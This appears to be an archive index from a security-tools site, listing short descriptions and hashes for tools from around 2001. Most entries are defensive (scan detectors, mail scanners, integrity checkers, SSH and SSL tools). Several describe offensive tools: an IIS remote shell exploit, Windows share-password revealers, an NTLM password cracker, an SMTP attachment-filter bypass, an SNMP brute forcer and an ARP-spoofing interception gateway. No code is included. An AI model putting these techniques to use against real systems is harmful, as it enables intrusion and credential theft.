Windows 2000 remote IIS .ida exploit - Spawns a shell on port 8008. Tested on Win2k with no service pack and SP2. Includes instructions on finding the offset.
a5c87b494e047e53be40395d92e556f28ceb11a767e48bdc5dfaeb792bf0cbf2
Share Password Checker acquires the list of shared folders of a Windows 95/98/Me machine on the network and shows you those folders' passwords. This tool acquires the list of the shared folders also for Windows NT/2000 machines, but it only distinguishes folders who have no password. "Share Password Checker" uses the"Share Level Password" Vulnerability. And "Share Password Checker" aims to check whether the patch for this vulnerability has been applied to the target host. Please see the topic Reveal Windows9x Share Password for more detail.
68ffcf6b92de4161369856d55490632077c5eedbc5d8e39999e6710a4768f31c
GetAcct sidesteps "RestrictAnonymous=1" and acquires account information on Windows NT/2000 machines.
5b6bbd73cb22a89f3ab034094eb23b9a4bd57627c373c87d1de7aa635ae60e38
ScoopLM searches out the password from LM/NTLM authentication information (LanManager and Windows NT challenge/response). Tested on Windows 2000.
383905e6cda11790aee4510ec73ca026bdcf996dccdaac5e51ba8609abc73a42
Promiscan is Windows software which searches for machines which are in promiscuous mode on the local network. It does this quickly and without generating a high network load. Tested on Windows 2000 professional. Requires Winpcap.
3a6524a2c100de9ecb3624e7cdb458d2c4772fa6e687cb2353e3824e3e5e5298
This is a Linux/portable port of OpenBSD's excellent OpenSSH. OpenSSH is based on the last free version of Tatu Ylonen's SSH with all patent-encumbered algorithms removed, all known security bugs fixed, new features reintroduced, and many other clean-ups.
3497cd653b279784cce1aa396afd42714a6d57bcfe180d6ca6198520adde498b
Port Scan Attack Detector (psad) is a perl program that is designed to work with Linux firewalling code (iptables in the 2.4.x kernels, and ipchains in the 2.2.x kernels) to detect port scans. It features a set of highly configurable danger thresholds (with sensible defaults provided), verbose alert messages that include the source, destination, scanned port range, begin and end times, TCP flags and corresponding nmap options (Linux 2.4.x kernels only), email alerting, and automatic blocking of offending IP addresses via dynamic configuration of ipchains/iptables firewall rulesets. In addition, for the 2.4.x kernels psad incorporates many of the TCP signatures included in Snort to detect highly suspect scans for various backdoor programs (e.g. EvilFTP, GirlFriend, SubSeven), DDoS tools (mstream, shaft), and advanced port scans (syn, fin, Xmas) which are easily leveraged against a machine via nmap.
29794f8eeb026de0c58ab24a283076072d77a7f8f61d8675b4f555b89fd68687
Attqt.pl is a tool for sending banned attachments through SMTP gateways by adding an invalid character to the filename. This is known to work on MailMarshall and TrendMicro Scanmail, others are probably vulnerable.
1a58cc9c0872e25c6653fb79721d64cc43fbadc32d4cce480e6cf5df091aa5b3
Snmpbrute-fixedup.c is a fixed version of snmpbrute.c, a very fast snmp brute forcer. Since it doesn't need to wait for a response, it can guess community's very fast. Tested on Slackware 3.6.
7dbc3fe51c35288a5bc8adfcd06b78f7c7b5f7a51c0d77e67f5bee417dd4f9ed
AE-Gateway is a Man-in-the-Middle Gateway to assist sniffing in switched environments. Forces itself to become an ivisible intermediary gateway between the gateway and the victim host. It works well for sniffing specified machines on switched networks. This is done through ARP reply spoofing and then ARP replys are sent upon application terminiation to set back the original MAC addresses in the ARP tables to minimize traffic interruption.
cb46879f462c268e3ecddd01f3bc39031e1efaa3b08464f9cd0ccee0d3454218
Guidelines for C source code auditing - A basic reference containing some tips, approaches and methods for finding vulnerabilities in C code.
b51ef94c9808338490069713f8eb6404b9f0ffddb2612c40f2369d7c13b0a159
Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL (Secure Sockets Layer) available on both Unix and Windows. Stunnel can allow you to secure non-SSL aware daemons and protocols (like POP, IMAP, NNTP, LDAP, etc) by having Stunnel provide the encryption, requiring no changes to the daemon's code.
58dbe96cc345f0da76e6db10ebb3c98646a3db01584b7d4fa8b27ed549838580
(Secure Shell) is a program to log into another computer over a network, to execute commands in a remote machine, and to move files from one machine to another, providing strong authentication and a secure communications over insecure channels.
c9d596726f4b8cec7f91f55f8f4a311c0233d4f2a4aa9768daa9fc764b521f0b
The Windows 9x Password List reader is a program that will allow you to see the passwords contained in your Windows pwl database under Unix. You can check the security of these files and try to recover the main password using the bruteforce mode.
cb2d359583804fca1732c431cd82aee6756dbf1f9180a56184ac03cf5fc5facf
Stegdetect is an automated tool for detecting steganographic content in images which is capable of detecting several different steganographic methods to embed hidden information in JPEG images. Currently, the detectable schemes are jsteg, jphide, and outguess 01.3b.
11e17ea9f4adb250f6a7213d4c0dd3c0e65b2683d506de2af85ea7489f6ed85f
snort-rep is a Snort reporting tool that can produce text or HTML output from a syslog snort log file. It is intended to be used for daily e-mail reports to the system administrators. If snort v1.8+ is used, all reports contain priority information, and the HTML output contains direct links to the IDS descriptions of whitehats.com.
b9895bf2d3226917e9a405e816c5229d3384461acf45e0229d7459ba3dc9c223
MIME Defanger is a flexible MIME e-mail scanner designed to protect Windows clients from viruses and other harmful executables. It works with Sendmail 8.10 / 8.11 and will alter or delete various parts of a MIME message according to a flexible configuration file.
b4825360f3b65836d1b64b2aadbc71cbfe615a5a8d9835c3f43ff1674b3d115c
Inflex is an email scanner which encapsulates your existing sendmail server setup. It scans both incoming and outgoing email and it does not alter your current /etc/sendmail.cf file. It can scan for email viruses, unwanted file types (eg. EXE, BMP, MPEG) and file names (eg. prettypark.exe). It can also be used to scan for text snippets within emails.
9c66c26c39cc8c6de30b8e4b31c13ab2ec4b8fc3a1ed4c01fd16df3ac39a4819
Knocker is a simple and easy-to-use TCP security port scanner written in C. It is able to analyze hosts and the network services which are running on them. Knocker it is available for Linux and Unix platforms. Both a console version and a GTK+ version are available.
b6c8714ba80236c603d417c1c42b30a02c8465c256262a46bab1a03246b5c0a6
Arpwarp is a tool which attempts to detect ARP spoofing attacks before executing a unix command (such as SSH or Telnet). This is the solaris version - The Linux version is available here.
13f3623d4cadab729d731d9c920bee3dcc06b5f67697649a85a68142852f9f6e
Slides for FX's talk at Defcon 2001 on attacking routing protocols.
68e73b3a5647139ae2a8b7ceb88bc2723866a295c5fdd1b4e948cc7d7e738e78
Snmpbrute.c is a very fast snmp brute forcer. Since it doesn't need to wait for a response, it can guess community's very fast. Tested on Slackware 3.6.
ede6eff88c71d88c2794ccb25e697d8172a81ad26b0789a338f10532bf344097
Petrovich is a GPLed filesystem integrity checker similar to Tripwire. It is written in Perl using standard perl modules available from www.cpan.org. It currently supports Base64 MD2, MD5, and SHA1 hashes. Petrovich has been tested on windows 2000, OpenBSD 2.6 - 2.8, and RedHat Linux 7.1.
f6d1536844bda3897c7a7ee1beafa6a618fa8544f48798df61fb93e8e5a76663
Winfingerprint v0.2.0 - Advanced remote windows OS detection. Current Features: Determine OS using SMB Queries, PDC (Primary Domain Controller), BDC (Backup Domain Controller), NT member server, NT Workstation, SQLServer, Novell Netware Server, Windows for Workgroups, Windows 9X, Enumerate Servers, Enumerate Shares including Administrative ($), Enumerate Global Groups, Enumerate Users, Displays Active Services, Ability to Scan Network Neighborhood, Ability to establish NULL IPC$ session with host, Ability to Query Registry (currently determines Service Pack Level & Applied Hotfixes.
4b22124cb653fd0d9ff945fcd920fd12590a43cc0067a120be6546c68cc4661b
Nmap is a utility for port scanning large networks, although it works fine for single hosts. Sometimes you need speed, other times you may need stealth. In some cases, bypassing firewalls may be required. Not to mention the fact that you may want to scan different protocols (UDP, TCP, ICMP, etc.). Nmap supports Vanilla TCP connect() scanning, TCP SYN (half open) scanning, TCP FIN, Xmas, or NULL (stealth) scanning, TCP ftp proxy (bounce attack) scanning, SYN/FIN scanning using IP fragments (bypasses some packet filters), TCP ACK and Window scanning, UDP raw ICMP port unreachable scanning, ICMP scanning (ping-sweep), TCP Ping scanning, Direct (non portmapper) RPC scanning, Remote OS Identification by TCP/IP Fingerprinting, and Reverse-ident scanning. Nmap also supports a number of performance and reliability features such as dynamic delay time calculations, packet timeout and retransmission, parallel port scanning, detection of down hosts via parallel pings. Screenshot available here.
b66d46f2fbd8e97a4a750e35af1a751650f38394d9bbf8fe0c184c027ba76590